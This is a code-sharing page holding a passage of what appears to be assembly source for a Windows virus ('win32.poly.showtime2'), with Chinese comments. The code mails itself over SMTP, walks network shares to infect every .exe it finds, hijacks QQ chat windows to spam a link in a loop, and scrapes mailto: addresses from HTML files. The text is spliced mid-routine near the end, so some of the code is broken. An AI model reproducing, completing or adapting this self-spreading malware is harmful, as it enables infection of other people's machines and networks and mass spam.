?? win32.poly.showtime2.txt
字號:
push esi
call _send[ebx]
jmp Next
szRcpt db "RCPT TO: <%s>",0dh,0ah,0
Rcpt db 80 dup(0)
Next:
push eMail
lea ecx,[offset szRcpt+ebx]
push ecx
lea ecx,[offset Rcpt+ebx]
push ecx
call _wsprintf[ebx]
add esp,0ch
lea ecx,[offset Rcpt+ebx]
push ecx
call _lstrlen[ebx]
push 0
push eax
lea ecx,[offset Rcpt+ebx]
push ecx
push esi
call _send[ebx]
push 0
push 6
call vData
db "DATA",0dh,0ah
vData:
push esi
call _send[ebx]
push MAX_PATH
call szSysDir
SysDir db MAX_PATH dup(0)
szSysDir:
call _GetSystemDirectory[ebx]
call szfile
db "\hello.eml",0
szfile :
lea ecx,[offset SysDir+ebx]
push ecx
call _lstrcat[ebx]
push NULL
push FILE_ATTRIBUTE_NORMAL
push OPEN_EXISTING
push NULL
push FILE_SHARE_READ
push GENERIC_READ OR GENERIC_WRITE
lea ecx,[offset SysDir+ebx]
push ecx
call _CreateFile[ebx]
mov hFile1[ebx],eax
cmp eax,INVALID_HANDLE_VALUE
jz SM_ret
push NULL
push hFile1[ebx]
call _GetFileSize[ebx]
push esi ;保存套接字
mov esi,eax
push PAGE_READWRITE
push MEM_COMMIT
push esi
push NULL
call _VirtualAlloc[ebx]
mov edi,eax
push 0
lea ecx,[offset dwRead+ebx]
push ecx ;最終讀出的字節數
push esi ;需要讀出的字節數
push edi ;數據緩沖區
push hFile1[ebx]
call _ReadFile[ebx]
pop esi ;恢復套接字
mov ecx,DWORD ptr dwRead[ebx]
re2:
sub ecx,1000
jb ex
push ecx
push 0
push 1000
push edi
push esi ;套接字
call _send[ebx]
add edi,1000
pop ecx
jmp re2
ex:
add ecx,1000
push 0
push ecx
push edi
push esi
call _send[ebx]
push 0
push 5
call szEndData
db 0dh,0ah, ".",0dh,0ah,0
szEndData:
push esi
call _send[ebx]
push 4000
call _Sleep[ebx]
push 0
push 6
call szQuit
db "QUIT",0dh,0ah,0
szQuit:
push esi
call _send[ebx]
push 4000
call _Sleep[ebx]
SM_ret:
push hFile1[ebx]
call _CloseHandle[ebx]
push esi
call _closesocket[ebx]
call _WSACleanup[ebx]
popad
ret
SendMail endp
myCallBack dd 0
EnumNetBoot proc ;列舉網絡Boot
;//開始列舉網絡資源
pushad
mov ebp,NULL ;//列舉網絡, 從根開始
mov eax,RESOURCEUSAGE_CONTAINER
lea ecx,[offset EnumNetWorkGroup+ebx]
mov DWORD ptr myCallBack[ebx],ecx
call EnumNetObject
popad
ret
EnumNetBoot endp
EnumNetWorkGroup proc ;//列舉工作組
;ebp=父資源緩沖區
push ecx
mov eax,RESOURCEUSAGE_CONTAINER
lea ecx,[offset EnumNetComputer+ebx]
mov DWORD ptr myCallBack[ebx],ecx
call EnumNetObject
pop ecx
ret
EnumNetWorkGroup endp
EnumNetComputer proc ;//列舉網絡計算機
;ebp=父資源緩沖區
push ecx
mov eax,RESOURCEUSAGE_CONTAINER
lea ecx,[offset EnumNetComputerShareDir+ebx]
mov DWORD ptr myCallBack[ebx],ecx
call EnumNetObject
pop ecx
ret
EnumNetComputer endp
EnumNetComputerShareDir proc ;//列舉網絡計算機共享目錄
;ebp=父資源緩沖區
push ecx
mov eax,RESOURCEUSAGE_CONNECTABLE
lea ecx,[offset DisplayMsg+ebx]
mov DWORD ptr myCallBack[ebx],ecx
call EnumNetObject
pop ecx
ret
EnumNetComputerShareDir endp
DisplayMsg proc ;//顯示列舉出來的共享目錄
push ebp
assume ebp:ptr NETRESOURCE
mov eax,[ebp].lpRemoteName
mov edi,[ebp].lpProvider
mov ebp,[ebp].lpRemoteName
call EnumFileObject
pop ebp
ret
DisplayMsg endp
;//用來列舉局域網某種對象
EnumNetObject proc
;//eax=資源標志 ,ebx=找到對象后自動回調函數指針, ebp=父資源緩沖區
pushad
push eax
push esp
push ebp
push eax
push RESOURCETYPE_DISK
push RESOURCE_GLOBALNET
call _WNetOpenEnumA[ebx]
pop esi ;//彈出hEnum句柄,平衡堆棧
or eax,eax
jnz short EnumNetObjectError
sub esp,100h
mov ebp,esp ;//在堆棧中開辟緩沖區
LoopEnumNetObject:
mov eax,1
push eax
;//一次列舉一個
mov eax,esp
push 100h ;//緩沖區大小(edi=100h)
push esp
push ebp
push eax
push esi
call _WNetEnumResourceA[ebx]
pop edi
pop edi ;//平衡堆棧
or eax,eax
jnz short EnumNetObjectOver
call myCallBack[ebx] ;//調用回調函數
jmp short LoopEnumNetObject
EnumNetObjectOver:
push esi
call _WNetCloseEnum[ebx]
add esp,100h
EnumNetObjectError:
popad
ret
EnumNetObject endp
;//用來列舉本地目錄/網絡上某個共享目錄
EnumFileObject proc
;ebp=父目錄的緩沖區
pushad
push ebp
call _SetCurrentDirectoryA[ebx]
or eax,eax
jz SetDirError
mov edi,100h
sub esp,edi ;//開辟200h字節的緩沖區
mov DWORD ptr [esp],2a2e2ah ;//建立"*.*"字符串
mov eax,esp
push esp
push eax
call _FindFirstFile[ebx]
mov esi,eax
inc eax
jz short EnumFileObjectError
LoopEnumFileObject:
push esp
push esi
call _FindNextFile[ebx]
;invoke FindNextFileA,esi,esp
or eax,eax
jz short EnumFileObjectOver
mov edi,esp
assume edi:ptr WIN32_FIND_DATA
lea ebp,[edi].cFileName
mov eax,[edi].dwFileAttributes
and eax,10h ;//測試文件屬性
jz short IsFileObject
IsDirObject: ;//是一個目錄
mov eax,DWORD ptr [ebp]
cmp al,"." ;//測試是否點目錄,是就不處理
jz short LoopEnumFileObject
call EnumFileObject ;//遞歸調用
jmp short LoopEnumFileObject
IsFileObject: ;//是一個文件
call FoundFileObject ;//整備該操作文件
jmp short LoopEnumFileObject
EnumFileObjectOver:
push esi
call _CloseHandle[ebx]
EnumFileObjectError:
mov DWORD ptr [esp],2e2eh ;// 恢復原來的當前目錄 建立字符串".."
push esp
call _SetCurrentDirectoryA[ebx]
add esp,100h ;//平衡堆棧
SetDirError:
popad
ret
EnumFileObject endp
FoundFileObject proc
;//ebp=不帶路徑的文件名
pushad
mov edi,ebp
xor eax,eax
LoopFindExtName:
inc edi
cmp [edi],al
jnz LoopFindExtName
mov eax,DWORD ptr[edi-4]
or eax,20202020h
cmp eax,"exe."
jnz NotExeFile
call szCurrentDirectory
CurrentDirectory db MAX_PATH dup (0)
szCurrentDirectory:
push MAX_PATH
call _GetCurrentDirectoryA[ebx]
call szA
db "\",0
szA:
lea ecx,[offset CurrentDirectory+ebx]
push ecx
call _lstrcat[ebx]
push ebp
push ecx
call _lstrcat[ebx]
push ecx
call InfectFile
NotExeFile:
popad
ret
FoundFileObject endp
;************************************
;取得MPR.DLL里相關函數地址
;************************************
GetMprFunction proc
pushad
call szMpr
db "mpr.dll",0
szMpr:
call _LoadLibraryA[ebx]
mov edi,eax
call szWNetOpenEnum
db "WNetOpenEnumA",0
_WNetOpenEnumA dd 0
szWNetOpenEnum:
push edi
call _GetProcAddress[ebx]
mov DWORD ptr _WNetOpenEnumA[ebx],eax
call szWNetEnumResourceA
db "WNetEnumResourceA",0
_WNetEnumResourceA dd 0
szWNetEnumResourceA:
push edi
call _GetProcAddress[ebx]
mov DWORD ptr _WNetEnumResourceA[ebx],eax
call szWNetCloseEnum
db "WNetCloseEnum",0
_WNetCloseEnum dd 0
szWNetCloseEnum:
push edi
call _GetProcAddress[ebx]
mov DWORD ptr _WNetCloseEnum[ebx],eax
popad
ret
GetMprFunction endp
;***********************************
;處理發送QQ消息的線程
;***********************************
QQ_Thread proc uses ebx esi edi Param:DWORD
pushad
call szMutex
MutexName db "logincom",0
szMutex:
push FALSE
push NULL
call _OpenMutex[ebx]
or eax,eax
jnz QQ_ret
lea ecx,[offset MutexName+ebx]
push ecx
push FALSE
push NULL
call _CreateMutex[ebx]
;********************************
;發送QQ消息過程
;********************************
re4:
call szWincap
db "發送消息",0
szSend db "送訊息(&S)",0
szMsg db "最感人的故事,最煽情的文章.一切盡在",0dh,0ah
db "http://www.xxx.net/index.htm",0
szClass db "RICHEDIT",0
QQSend dd 0
hEdit dd 0
hSend dd 0
szWincap:
push NULL
call _FindWindowA[ebx]
mov DWORD ptr QQSend[ebx],eax
or eax,eax
jz QQ_ret
push 0
lea ecx,[offset szClass+ebx]
push ecx
push NULL
push QQSend[ebx]
call _FindWindowExA[ebx]
mov DWORD ptr hEdit[ebx],eax
lea ecx,[offset szSend+ebx]
push ecx
push NULL
push NULL
push QQSend[ebx]
call _FindWindowExA[ebx]
mov DWORD ptr hSend[ebx],eax
or eax,eax
jz QQ_ret
lea ecx,[offset szMsg+ebx]
push ecx
push 0
push WM_SETTEXT
push hEdit[ebx]
call _SendMessageA[ebx]
push 0
push 0
push BM_CLICK
push hSend[ebx]
call _SendMessageA[ebx]
push 2000
call _Sleep[ebx]
jmp re4
QQ_ret:
popad
ret
QQ_Thread endp
;*****************************************
;分析MailFileName(*.htm*),尋找Mail_Addr.
;pkxp的代碼
;*****************************************
Parse_HTM PROC htmFileName :DWORD
LOCAL hFile : DWORD
LOCAL hMapping : DWORD
LOCAL SafeFSize: DWORD
pushad
push 0
push FILE_ATTRIBUTE_NORMAL
push OPEN_EXISTING
push 0
push FILE_SHARE_READ
push GENERIC_READ
push htmFileName
call _CreateFile[ebx]
or eax,eax
jz PH_Exit
mov hFile , eax
xor eax,eax
push eax
push eax
push eax
push PAGE_READONLY
push eax
push hFile
call _CreateFileMapping[ebx]
or eax,eax
jz PH_Close
mov hMapping,eax
xor eax,eax
push eax
push eax
push eax
push FILE_MAP_READ
push hMapping
call _MapViewOfFile[ebx]
or eax,eax
jz PH_Close2
xchg eax,esi ;esi = pMapping
push 0
push hFile
call _GetFileSize[ebx]
sub eax,16 ;For security
add eax,esi
mov SafeFSize,eax ;esi必須小于SafeFSize
.while esi < SafeFSize
push esi
xor edx,edx ;Valid = FALSE
@pushsz "mailto:"
pop edi
push 7 ;"mailto:" 字符串長度
pop ecx
repz cmpsb
.if zero? ;找到 mailto:
lea edi,[offset TempMailTo+ebx]
push edi
.while esi
sock sockaddr_in <0>
wfd WIN32_FIND_DATA <0>
hProcess dd 0
_GetProcessAddress dd 0
hMem dd 0
E8_addr dd 0
VirusLen=$-offset VStart
VEnd:
End VStart ?? 快捷鍵說明
復制代碼
Ctrl + C
搜索代碼
Ctrl + F
全屏模式
F11
切換主題
Ctrl + Shift + D
顯示快捷鍵
?
增大字號
Ctrl + =
減小字號
Ctrl + -